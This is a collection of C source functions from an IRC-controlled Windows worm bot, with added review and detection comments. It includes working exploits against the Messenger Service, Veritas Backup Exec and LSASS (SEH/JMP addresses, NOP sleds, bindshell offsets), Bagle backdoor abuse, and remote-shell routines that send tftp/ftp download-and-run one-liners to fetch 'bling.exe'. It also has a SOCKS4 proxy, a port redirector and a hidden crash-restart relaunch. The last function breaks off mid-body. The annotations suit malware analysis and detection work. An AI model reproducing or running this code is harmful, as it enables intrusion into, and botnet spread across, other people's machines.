	while(1) {
		memset(buffer, 0, sizeof(buffer));
		if (frecv(sock, buffer, sizeof(buffer), 0) <= 0) 
			break;

		// FIX ME: Truncation occurs here
		numlines = Split(buffer,&lines);
		for (i=0;i < numlines ;i++) {
			repeat=1;
			// A parser result > 1 re-runs the same line that many times,
			// spaced by FLOOD_DELAY.
			do {
				#ifdef DEBUG_LOGGING
				debuglog(lines[i]);
				#endif
				#ifdef DEBUG_CONSOLE
				printf("%s\n",lines[i]);
				#endif

				if (lines[i] != NULL) 
					repeat = IRC_ProtocolParse(lines[i], sock, server, channel, chanpass, nick, host, masters, &in_channel, repeat, clone);
				repeat--;

				if (repeat > 0)
					Sleep(FLOOD_DELAY);
			} while (repeat > 0);

			switch (repeat) {
			case -1:
				return 0; // Reconnect
			case -2:
				return 1; // Disconnect
			case -3:
				return 2; // Quit
			default:
				break;
			}
		}
	}

	return 0;
}
// Sends a single crafted UDP datagram (built by PreparePacket) to
// exinfo.ip:exinfo.port after fingerprinting the host with FpHost, then
// checks for a listener on TCP 9191 via ConnectShellEx.
//
// exinfo: target ip/port and exploit index.
// Returns TRUE only when ConnectShellEx reports success.
//
// Review notes on the code as written:
//  - `ver` is assigned only for OS_WIN2K / OS_WINXP; any other FpHost result
//    that passes the first guard leaves it uninitialised (whether such a value
//    exists is not visible here).
//  - sockUDP is leaked when fsendto fails (no close on that path).
//  - The datagram is sent blind: no reply is read and no error is reported.
//  - Detection: a UDP datagram of PreparePacket's size to the Messenger port,
//    followed ~500 ms later by a TCP connect to 9191 on the same host.
BOOL MessengerService(EXINFO exinfo)
{
    int sockUDP,ver,packetsz;
    unsigned char packet[8192];
    struct sockaddr_in targetUDP;

    // Per-target constants selected by `ver`; values are fixed in the source.
    struct
    {
        char os[30];
        DWORD SEH;
        DWORD JMP;
    } targetOS[] =
        {
            {
                "Windows 2000 SP 3 (en)",
                0x77ee044c, // unhandledexceptionfilter pointer
                0x768d693e // cryptsvc.dll call [esi+48] 0x768d693e
            },
            {
                "Windows XP SP 1 (en)",
                0x77ed73b4,
                0x7804bf52 //rpcrt4.dll call [edi+6c]
            }
        };

    int TargetOS = FpHost(exinfo.ip, FP_RPC);
    if ((TargetOS == OS_WINNT) || (TargetOS == OS_UNKNOWN)) return FALSE;
    if (TargetOS == OS_WIN2K) ver = 0;
    if (TargetOS == OS_WINXP) ver = 1;
    ZeroMemory(&targetUDP, sizeof(targetUDP));

    targetUDP.sin_family = AF_INET;
    targetUDP.sin_addr.s_addr = finet_addr(exinfo.ip);
    targetUDP.sin_port = fhtons(exinfo.port);


    packetsz = PreparePacket((char*)packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH);


    if ((sockUDP = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
    {
        return FALSE;
    }

    if (fsendto(sockUDP, (char*)packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1)
    {
        return FALSE;
    }
    fclosesocket(sockUDP);
	Sleep(500);
    if (ConnectShellEx(exinfo, 9191) == true) {
        exploit[exinfo.exploit].stats++;
        return TRUE;
    }
    return FALSE;
}
// Connects to a command shell expected on exinfo.ip:bindport, sends a
// "tftp -i <our ip> get <filename> & <filename>" line and then the bare
// filename, i.e. instructs the remote shell to fetch and run the bot binary
// from this host.
//
// exinfo:   target ip and the IRC socket used to derive our own IP (GetIP).
// bindport: TCP port of the remote shell.
// Returns true once both lines were sent, false on socket/connect/send failure.
//
// Review notes on the code as written:
//  - With NO_TFTPD defined, mkdir_buff is sent uninitialised (no other
//    assignment precedes the first fsend).
//  - sockfd leaks on every early `return false` after it is created.
//  - recvbuf is read but never examined; `len` is write-only.
//  - Detection: the "tftp -i ... get" command string on an inbound shell
//    session, and an outbound TFTP (UDP 69) request back to the bot's address.
BOOL SkonkShell( EXINFO exinfo, unsigned int bindport ) {
		int len;
		char recvbuf[1024];
		SOCKET sockfd;
		SOCKADDR_IN shell_addr;
		memset(&shell_addr, 0, sizeof(shell_addr));

		shell_addr.sin_family = AF_INET;
		shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
		shell_addr.sin_port = fhtons(bindport);

		if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
			return false;

		if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR) 
			return false;
		
		char mkdir_buff[400];

		// Drain the shell's banner/prompt; the content is not inspected.
		len = frecv(sockfd, recvbuf, 1024, 0);
//////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////
#ifndef NO_TFTPD
		_snprintf(mkdir_buff, sizeof (mkdir_buff),
			"tftp -i %s get %s &%s\r\n",
			GetIP( exinfo.sock ),filename, filename);
#endif
//////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////




//////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////
		if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
			return false;
		
		Sleep(500);
		_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);


		if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
			return false;
		len = frecv(sockfd, recvbuf, 1024, 0);

		fclosesocket(sockfd);
		return true;

}
// Listener half of the SOCKS4 proxy feature: binds socks4.port on all
// interfaces and starts a Socks4ClientThread for every accepted client.
//
// param: pointer to a SOCKS4 struct, copied by value; gotinfo = TRUE signals
//        the spawner that the copy is complete.
// Never returns normally; exits via ExitThread(0).
//
// Review notes on the code as written:
//  - ssock is not checked against INVALID_SOCKET before bind.
//  - faccept's result is not checked; an INVALID_SOCKET is registered as a
//    client thread and handed to Socks4ClientThread.
//  - The `if` at CreateThread is an assignment (tests the stored handle).
//  - addlog(sendbuf) sits outside the else, so it runs after every accept,
//    logging whichever message sendbuf holds at that point.
//  - The "Failed to start server" message is emitted on every exit path,
//    including a successful run that ended.
//  - Detection: a new listener (socks4.port) advertised in IRC as "[SOCKS4]".
DWORD WINAPI Socks4Thread(LPVOID param)
{
	char sendbuf[IRCLINE];

	SOCKADDR_IN ssin, csin;
	SOCKET ssock, csock;
	DWORD lpThreadId;

	int csin_len = sizeof(csin);

	SOCKS4 socks4 = *((SOCKS4 *)param);
	SOCKS4 *socks4p = (SOCKS4 *)param;
	socks4p->gotinfo = TRUE;

	memset(&ssin,0,sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons((unsigned short)socks4.port);
	ssin.sin_addr.s_addr = INADDR_ANY;

	ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	threads[socks4.threadnum].sock=ssock;

	if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) {	
		if (flisten(ssock, 10) == 0) {
			sprintf(sendbuf, "[SOCKS4]: Server started on: %s:%d.", GetIP(socks4.sock), socks4.port);
			if (!socks4.silent) irc_privmsg(socks4.sock, socks4.chan, sendbuf, socks4.notice);
			addlog(sendbuf);
			
			while (1) {
				csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len);
				// The local copy is shared with the child by address; the
				// cgotinfo spin-wait keeps it stable until the child copied it.
				socks4.cgotinfo = FALSE;
				sprintf(sendbuf,"[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), csin.sin_port, socks4.threadnum);
				socks4.cthreadnum = addthread(sendbuf,SOCKS4_THREAD,csock);
				threads[socks4.cthreadnum].parent = socks4.threadnum;
				if (threads[socks4.cthreadnum].tHandle = CreateThread(NULL, 0, &Socks4ClientThread, (LPVOID)&socks4, 0, &lpThreadId)) {
					while (socks4.cgotinfo == FALSE) 
						Sleep(5);
				} else
					sprintf(sendbuf, "[SOCKS4]: Failed to start client thread, error: <%d>.", GetLastError());
				addlog(sendbuf);
			}
		}
	}
	fclosesocket(ssock);

	sprintf(sendbuf, "[SOCKS4]: Failed to start server on Port %d.", socks4.port);
	if (!socks4.silent) irc_privmsg(socks4.sock, socks4.chan, sendbuf, socks4.notice);
	addlog(sendbuf);

	clearthread(socks4.threadnum);

	ExitThread(0);
}
// SEH handler installed by the bot (registration code not visible here). On
// any unhandled exception it tears down networking and threads, relaunches
// its own executable as a detached, hidden process with the system directory
// as working directory, and then exits — a crash-restart watchdog.
//
// ExceptionRecord, EstablisherFrame, ContextRecord, DispatcherContext: the
// standard x86 SEH handler arguments; only ContextRecord is used.
// Returns ExceptionContinueExecution in the source, but ExitProcess(0) runs
// first, so the return statement is unreachable.
//
// Review notes on the code as written:
//  - fWSACleanup is called twice in a row (presumably to balance two
//    WSAStartup calls; not visible here).
//  - `cdecl` (no leading underscore) is presumably a macro for __cdecl.
//  - `scratch` is a global not visible on this page; EAX is redirected to it so
//    a faulting write would succeed if execution were resumed.
//  - The inline asm pops the handler's own EXCEPTION_REGISTRATION record from
//    the FS:[0] chain; with ExitProcess following, it has no observable effect.
//  - Detection: a process that re-spawns itself from %SystemRoot%\system32
//    (GetSystemDirectory as cwd) immediately after an access violation.
EXCEPTION_DISPOSITION cdecl _except_handler(struct _EXCEPTION_RECORD *ExceptionRecord,
	void *EstablisherFrame,struct _CONTEXT *ContextRecord,void *DispatcherContext)
{	

	// do some clean-up
	fclosesocket(threads[0].sock);
	killthreadall();
	fWSACleanup();
	fWSACleanup();
	Sleep(100);
	
	PROCESS_INFORMATION pinfo;
	STARTUPINFO sinfo;
	memset(&pinfo, 0, sizeof(pinfo));
	memset(&sinfo, 0, sizeof(sinfo));
	sinfo.lpTitle = "";
	sinfo.cb = sizeof(sinfo);
	sinfo.dwFlags = STARTF_USESHOWWINDOW;
	#ifdef DEBUG_CONSOLE
	sinfo.wShowWindow = SW_SHOW;
	#else
	sinfo.wShowWindow = SW_HIDE;
	#endif
		
	char botfile[MAX_PATH],sysdir[MAX_PATH];
	GetSystemDirectory(sysdir, sizeof(sysdir));
	GetModuleFileName(NULL, botfile, sizeof(botfile));

	// Relaunch ourselves; handles are closed right away since the new process
	// is not waited on.
	if (CreateProcess(NULL, botfile, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, sysdir, &sinfo, &pinfo)) {
		Sleep(100);
		CloseHandle(pinfo.hProcess);
		CloseHandle(pinfo.hThread);
	}

	// Change EAX in the context record so that it points to someplace
	// where we can successfully write
	ContextRecord->Eax = (DWORD)&scratch;

	_asm
	{                           // Remove our EXECEPTION_REGISTRATION record
		mov     eax,[ESP]       // Get pointer to previous record
		mov     FS:[0], EAX     // Install previous record
		add     esp, 8          // Clean our EXECEPTION_REGISTRATION off stack
	}

	ExitProcess(0);

	// Tell the OS to restart the faulting instruction
	return ExceptionContinueExecution;
}
 // Connects to a command shell on exinfo.ip:xport (xport is a global not
 // visible here) and sends a download-and-run command line for the bot
 // binary, built with tftp and/or ftp depending on build flags.
 //
 // exinfo: target ip and the IRC socket used by GetIP() to find our own address.
 // Returns true once both lines were sent; false on socket/connect/send failure.
 //
 // Review notes on the code as written:
 //  - When neither NO_TFTPD nor NO_FTPD is defined, the ftp variant overwrites
 //    the tftp variant, so only the ftp command is ever sent; when both are
 //    defined, mkdir_buff is sent uninitialised.
 //  - The tftp format has two %s placeholders but three arguments.
 //  - sockfd leaks on every early `return false` after it is created.
 //  - `fhtons(xport);;` — stray empty statement.
 //  - Detection: the "echo open ... ftp -n -s:o" one-liner (or "tftp -i ... get")
 //    arriving on an inbound shell session, then an FTP/TFTP connection back to
 //    the bot on FTP_PORT / UDP 69.
 bool ConnectShell2(EXINFO exinfo) {

		int len;
		char recvbuf[1024];
		SOCKET sockfd;
		SOCKADDR_IN shell_addr;
		memset(&shell_addr, 0, sizeof(shell_addr));
		

		shell_addr.sin_family = AF_INET;
		shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
		shell_addr.sin_port = fhtons(xport);;

		if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
			return false;
		if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR) 
			return false;
		
		char mkdir_buff[400];

		// Drain the shell's banner/prompt; content not inspected.
		len = frecv(sockfd, recvbuf, 1024, 0);
		#ifndef NO_TFTPD
		_snprintf(mkdir_buff, sizeof (mkdir_buff),
		"tftp -i %s get %s\r\n",
		GetIP(exinfo.sock),filename, filename);	
		#endif
		#ifndef NO_FTPD
		_snprintf(mkdir_buff, sizeof (mkdir_buff),
		"echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s\r\n",
		GetIP(exinfo.sock),FTP_PORT, filename, filename);	
		#endif
		if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
			return false;
		
		Sleep(500);
		// Second line: run the downloaded file by name.
		_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);


		if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
			return false;
		len = frecv(sockfd, recvbuf, 1024, 0);

		fclosesocket(sockfd);
		return true;

}
// Talks to a Beagle/Bagle backdoor at exinfo.ip:exinfo.port: sends one of two
// global auth blobs (chosen by exinfo.command), reads an 8-byte reply, and
// then sends a URL pointing at this host's HTTP server (httpport) and the
// bot's own file name, i.e. asks the backdoor to fetch the bot.
//
// exinfo: target ip/port, command name, exploit index and IRC reporting fields.
// Returns TRUE when the URL send did not return 0.
//
// Review notes on the code as written:
//  - sizeof(BeagleAuth) is the size of a char pointer, not the auth blob, so
//    only 4 (or 8) bytes of the blob are sent.
//  - fsend(..., buffer, sizeof(buffer), 0) sends the whole IRCLINE buffer,
//    including uninitialised bytes after the URL's terminator.
//  - `if(fsend(...))` treats SOCKET_ERROR (-1) as success; success is only
//    FALSE when fsend returns exactly 0.
//  - fclosesocket runs even when fsocket returned INVALID_SOCKET.
//  - Detection: "http://<bot ip>:<httpport>/<exe name>" sent to the backdoor
//    port, then an HTTP GET for that name back to the bot.
BOOL Beagle(EXINFO exinfo)
{
	char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];

	BOOL success = FALSE;

	// Winsock is (re)initialised per call; WSAStartup/WSACleanup are
	// reference counted, so this nests with the bot's own initialisation.
	WSADATA WSAData; 
	if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0) 
		return FALSE; 

	SOCKET sSock;
	if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
		SOCKADDR_IN ssin;
		memset(&ssin, 0, sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
		ssin.sin_port = fhtons(exinfo.port);

		if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
			BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
			if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
				if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
					// Reduce our full path to "<name><ext>" for the URL.
					GetModuleFileName(0, botfile, sizeof(botfile));
					_splitpath(botfile, NULL, NULL, fname, ext);
					_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
					_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);

					if(fsend(sSock, buffer, sizeof(buffer), 0)) 
						success = TRUE;
				}
			}
		}
	}

	fclosesocket(sSock);
	fWSACleanup();

	if (success) {
		_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
		if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		addlog(buffer);
		exploit[exinfo.exploit].stats++;
	}

	return (success);
}
// Waits up to 30 s for `ssock` to become readable.
//
// ssock: the socket to poll (the caller then performs the actual recv).
// Returns 0 when readable, -1 on timeout or select error — in which case the
// socket is closed here as a side effect.
//
// Review note: because this function closes the caller's socket on failure
// while the caller (NetDevil on this page) also closes it after `break`, the
// socket is closed twice on the timeout path.
int NetDevil_Receive(SOCKET ssock)
{
	TIMEVAL timeout;
    timeout.tv_sec = 30;//timeout after 30 sec.
    timeout.tv_usec = 0;

   	fd_set fd_struct;
   	FD_ZERO(&fd_struct);
    FD_SET(ssock, &fd_struct);

	// First argument (nfds) is ignored by Winsock select.
	if (fselect(0, &fd_struct, NULL, NULL, &timeout) <= 0) {
		fclosesocket(ssock); 
		return -1;
	}

	return 0;
}
// Second variant of ConnectShell2 on this page: connects to a shell on
// exinfo.ip:7777 (hard-coded) and sends an ftp-script one-liner that
// downloads "bling.exe" from this host and runs it, followed by `filename`.
//
// exinfo: target ip and the IRC socket used by GetIP() to find our own address.
// Returns true once both lines were sent; false on socket/connect/send failure.
//
// Review notes on the code as written:
//  - The first command fetches and runs the literal "bling.exe" while the
//    second line runs the global `filename`; the two need not agree.
//  - sockfd leaks on every early `return false` after it is created.
//  - recvbuf is read but never examined; `len` is write-only.
//  - Detection: inbound shell traffic on 7777 carrying "echo open ... ftp -n -s:o",
//    then an FTP connection back to the bot on FTP_PORT.
bool ConnectShell2(EXINFO exinfo) {

		int len;
		char recvbuf[1024];
		SOCKET sockfd;
		SOCKADDR_IN shell_addr;
		memset(&shell_addr, 0, sizeof(shell_addr));
		

		shell_addr.sin_family = AF_INET;
		shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
		shell_addr.sin_port = fhtons(7777);

		if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
			return false;
		if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR) 
			return false;
		
		char mkdir_buff[400];

		// Drain the shell's banner/prompt; content not inspected.
		len = frecv(sockfd, recvbuf, 1024, 0);

		_snprintf(mkdir_buff, sizeof (mkdir_buff),
		"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
		GetIP(exinfo.sock),FTP_PORT);	


		if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
			return false;
		
		Sleep(500);
		_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);


		if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
			return false;
		len = frecv(sockfd, recvbuf, 1024, 0);

		fclosesocket(sockfd);
		return true;

}
// FIX ME: This could probably be (re)moved, its just from the original exploit layout.
// TCP connect with a timeout: opens a non-blocking socket to WksIP:port,
// waits up to `tm` seconds for the connect to complete, then switches the
// socket back to blocking mode.
//
// tm:    timeout in seconds.
// port:  TCP port in host byte order.
// WksIP: dotted IPv4 address (finet_addr, no DNS).
// Returns the connected socket as an int, or -1 on socket failure or when the
// socket did not become writable in time.
//
// Review notes on the code as written:
//  - sock is `unsigned int` compared with -1; on Win32 INVALID_SOCKET is the
//    same all-ones value, so this works incidentally.
//  - The fselect return value is ignored; only the write-set membership test
//    decides, and exceptfds is populated but never consulted.
//  - `__fWSAFDIsSet` is a reserved-style identifier (double underscore);
//    presumably a wrapper for Winsock's __WSAFDIsSet.
//  - A blocking connect that succeeds immediately skips the timeout block,
//    which only runs when fconnect returns -1 (the normal non-blocking case).
int WksSocket(int tm, int port, const char *WksIP) {

	unsigned int sock;
	unsigned long y = 1;
	struct timeval timeout;
	struct sockaddr_in target_ip;

	if ((sock = fsocket(AF_INET, SOCK_STREAM, 0)) == -1) 
		return -1;

	target_ip.sin_family = AF_INET;
	target_ip.sin_addr.s_addr = finet_addr(WksIP);
	target_ip.sin_port = fhtons(port);

	// y == 1: non-blocking.
	fioctlsocket(sock,FIONBIO,&y);

	timeout.tv_sec=tm;
	timeout.tv_usec = 0;

	if (fconnect(sock, (struct sockaddr *)&target_ip, sizeof(target_ip)) == -1) 
	{
		fd_set writefds;
		fd_set exceptfds;

		FD_ZERO (&writefds);
		FD_ZERO (&exceptfds);
		FD_SET (sock, &writefds);
		FD_SET (sock, &exceptfds);

		fselect(0, NULL, &writefds, &exceptfds, &timeout);  

		//if (!FDI_ISSET (sock, &writefds)) 
		if (!__fWSAFDIsSet(sock, &writefds)) 
		{
				fclosesocket(sock);
			return -1;
		}
		// y == 0: back to blocking for the caller.
		y=0;
		fioctlsocket(sock,FIONBIO,&y);
	}
	return sock;
}
// part of the redirect function, handles sending/recieving for the local connection.
// One direction of the port redirect: copies everything received on the
// client socket (threads[n].csock) to the server socket (threads[n].sock)
// until either side fails.
//
// param: pointer to a REDIRECT struct, copied by value; cgotinfo = TRUE
//        signals the spawner that the copy is complete.
// Never returns normally; exits via ExitThread(0) after closing csock and
// clearing the slot.
//
// Review note: the same slot's .sock is the redirect's upstream socket; it is
// not closed here, so the other direction's thread (not on this page) is
// presumably responsible for it.
DWORD WINAPI RedirectLoop2Thread(LPVOID param)
{
	REDIRECT redirect = *((REDIRECT *)param);
	REDIRECT *redirectp = (REDIRECT *)param;
	redirectp->cgotinfo = TRUE;

	int threadnum=redirect.cthreadnum, err;
	
	char buff[4096];

	while (1) {
		memset(buff, 0, sizeof(buff));
		// err holds the byte count from recv and is reused as the send length.
		if ((err = frecv(threads[threadnum].csock, buff, sizeof(buff), 0)) <= 0) break;
		if ((err = fsend(threads[threadnum].sock, buff, err, 0)) == SOCKET_ERROR) break;
	}
	fclosesocket(threads[threadnum].csock);

	clearthread(threadnum);

	ExitThread(0);
}
// Patches two 4-byte values into the global `talk` buffer, sends it to
// exinfo.ip:exinfo.port, follows with seven 800-byte copies of the global
// `veritassc`, waits 1 s and then calls ConnectShell on port 101.
//
// exinfo: target ip/port and reporting fields for AddEx.
// Returns AddEx(exinfo, true) — i.e. always reports success once the sends
// complete; false only on socket/connect/send failure.
//
// Review notes on the code as written:
//  - `sock == SOCKET_ERROR` is compared instead of INVALID_SOCKET; both convert
//    to the same all-ones value on Win32, so it works incidentally.
//  - strcpy(payload, veritassc) is unbounded into an 800-byte buffer, and the
//    send uses sizeof(payload) regardless of veritassc's length.
//  - sock leaks on every early `return false` after it is created.
//  - ConnectShell's result is ignored; AddEx is called with `true` unconditionally.
//  - Detection: the connect on exinfo.port followed by seven equal-size
//    800-byte writes, then a TCP connect to port 101 on the same host.
bool veritasbackupserver(EXINFO exinfo) {

	SOCKET sock;
	if ((sock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) return false;

	SOCKADDR_IN sin; 
	memset(&sin, 0, sizeof(sin));
	sin.sin_family = AF_INET; 
	sin.sin_port = fhtons((unsigned short)exinfo.port);
	sin.sin_addr.s_addr = finet_addr(exinfo.ip);

	char payload[800];
	char v91sp0sp1[]="\xFF\x50\x11\x40";
	char esisp0sp1[]="\xA1\xFF\x42\x01";
	
	// `talk` is a global; it is modified in place on every call.
	memcpy(&talk[37], &v91sp0sp1, 4);
	memcpy(&talk[72], &esisp0sp1, 4);
	//os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0";
	
	strcpy(payload,veritassc);

	if (fconnect(sock, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) return false;

	if (fsend(sock,talk,sizeof(talk)-1,0)==SOCKET_ERROR) return false;
	Sleep(10);

	for (int i=0; i < 7;i++) {
		if (fsend(sock,payload,sizeof(payload),0) == SOCKET_ERROR) return false;
		Sleep(10);
	}
	Sleep(1000);

	fclosesocket(sock);

	ConnectShell(exinfo,101);

	return (AddEx(exinfo,true));
}
// Waits up to 30 seconds for `sock` to become readable, then reads one message into the
// global k2_buffer and checks the command field through k2_msg (presumably a struct view
// over k2_buffer - confirm where it is declared).
//
// Returns 0 when a message other than K2_ERROR arrived, -1 on select timeout/error (the
// socket is closed in that case), on recv failure, or when the peer reported K2_ERROR.
// NOTE(review): the socket is closed only on the select path; on the recv and K2_ERROR
// paths it stays open and the caller must close it.
// NOTE(review): no check that the read was long enough to populate k2_msg->command; after
// a short read the field holds whatever the memset left (zero) - TODO confirm K2_ERROR != 0.
int KUANG_Reciev(SOCKET sock)
{
	TIMEVAL time;
	time.tv_sec = 30; //timeout after 30 sec.
	time.tv_usec = 0;

	fd_set fd_struct;
   	FD_ZERO(&fd_struct);
	FD_SET(sock, &fd_struct);

	// first argument is ignored by Winsock select(); fd_struct is the read set
	if (fselect(0, &fd_struct, NULL, NULL, &time) <= 0) {
		fclosesocket(sock); 
		return -1;
	}

	memset(k2_buffer,0,sizeof(k2_buffer));
	if (frecv(sock, k2_buffer, sizeof(k2_buffer), 0) < 1) 
		return -1;
	if (k2_msg->command == K2_ERROR)
		return -1;
      	      
	return 0;
}	
Пример #28
// Propagation routine: sends a fixed SMB/DCERPC request sequence (reqx1..reqx9, with a
// crafted buffer spliced in) to exinfo.ip:exinfo.port, then connects to the bind shell
// the payload `bindshell` is expected to open on LSASS_BSPORT and types a command line
// that downloads and runs "bling.exe" from this bot's own IP over FTP. The name and the
// hard-coded offsets suggest the public LSASS (MS04-011-era) exploit, but the request
// blobs themselves are defined elsewhere and are not verifiable from here.
//
// Target selection: FpHost() fingerprints the RPC service; NT and unknown hosts are
// skipped. XP gets variant 0 (single request, strBuffer); everything else gets variant 1
// (90%) or 2 (10%) - the two-request screq2k/screq2k2 form - chosen with rand()%10.
//
// exinfo: target address/port, IRC reporting context and exploit index for stats.
// Returns TRUE only if the bind shell answered and the command was sent.
//
// Detection notes (all visible below): the dropped-file name "bling.exe", the FTP
// script file "o" built with `echo open <ip> <FTP_PORT> > o`, the login "user 1 1",
// and a connect-back to LSASS_BSPORT on the victim right after the SMB session.
//
// NOTE(review): every frecv() result is stored in `len` and then ignored, so the SMB
// replies are never validated; recvbuf is never NUL-terminated (it is only used as a
// sink). On the final `return FALSE` (no banner from the shell) neither socket is closed.
// NOTE(review): the fixed offsets (buf[2020], [2036], [2840], [2844], [2856],
// strBuffer+1980, [1964]) assume LEN and BUFSIZE are large enough; neither is visible here.
BOOL lsass2(EXINFO exinfo)
{
	int i, targetx, len, targetxOS;

	char hostipc[40];
	char hostipc2[40*2];
	char buf[LEN+1];
	char sendbuf[(LEN+1)*2];
	char req4u[sizeof(reqx4)+20];
	char screq[BUFSIZE+sizeof(reqx7)+1500+440];
	char screq2k[4348+4060];
	char screq2k2[4348+4060];
	char recvbuf[1600];
	char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
	char strBuffer[BUFSIZE];

	char buffer[IRCLINE], cmd_buff[400];

	char smblen;
	char unclen;

	unsigned short port;

	SOCKET sSocket, bSocket;
	SOCKADDR_IN ssin, bsin;

	// fingerprint first; bail on NT or when the OS could not be determined
	targetxOS = FpHost(exinfo.ip, FP_RPC);
	if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT))
		return FALSE;

	if (targetxOS == OS_WINXP)
		targetx = 0;
	else if (rand() % 10)
		targetx = 1;
	else
		targetx = 2;

	// UNC path of the IPC$ share, then widened to UTF-16LE by interleaving zero bytes
	_snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip);

	for (i=0; i<40; i++) {
		hostipc2[i*2] = hostipc[i];
		hostipc2[i*2+1] = 0;
	}

	// splice the wide UNC path into a copy of reqx4 and fix up the two length bytes
	memcpy(req4u, reqx4, sizeof(reqx4)-1);
	memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
	memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9);

	smblen = 52+(char)strlen(hostipc)*2;
	memcpy(req4u+3, &smblen, 1);

	unclen = 9 + (char)strlen(hostipc)*2;
	memcpy(req4u+45, &unclen, 1);

	// the listen port is stored XOR 0x9999 at offset 176 of the shellcode (decoded at runtime there, presumably)
	port = fhtons(LSASS_BSPORT)^(USHORT)0x9999;
	memcpy(&bindshell[176], &port, 2);

	if ((targetx == 1) || (targetx == 2)) {
		memset(buf, NOP, LEN);

		//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
		memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4);
		memcpy(&buf[2036], &bindshell, strlen(bindshell));

		memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
		memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr
		//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr

		memcpy(&buf[2856], &bindshell, strlen(bindshell));

		// widen buf to UTF-16LE for the two-request variant
		for (i=0; i<LEN; i++) {
			sendbuf[i*2] = buf[i];
			sendbuf[i*2+1] = 0;
		}
		sendbuf[LEN*2]=0;
		sendbuf[LEN*2+1]=0;

		memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
		memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);

	} else {
		// single-request variant: NOP sled, shellcode at +160, stack-adjust stub at +1980,
		// return address overwritten at +1964 (only if BUFSIZE covers these offsets)
		memset(strBuffer, NOP, BUFSIZE);
		memcpy(strBuffer+160, bindshell, strlen(bindshell));
		memcpy(strBuffer+1980, strasm, strlen(strasm));
		*(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr;
	}

	memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500);

	if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR)
		return FALSE;

	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons((unsigned short)exinfo.port);
	ssin.sin_addr.s_addr = finet_addr(exinfo.ip);

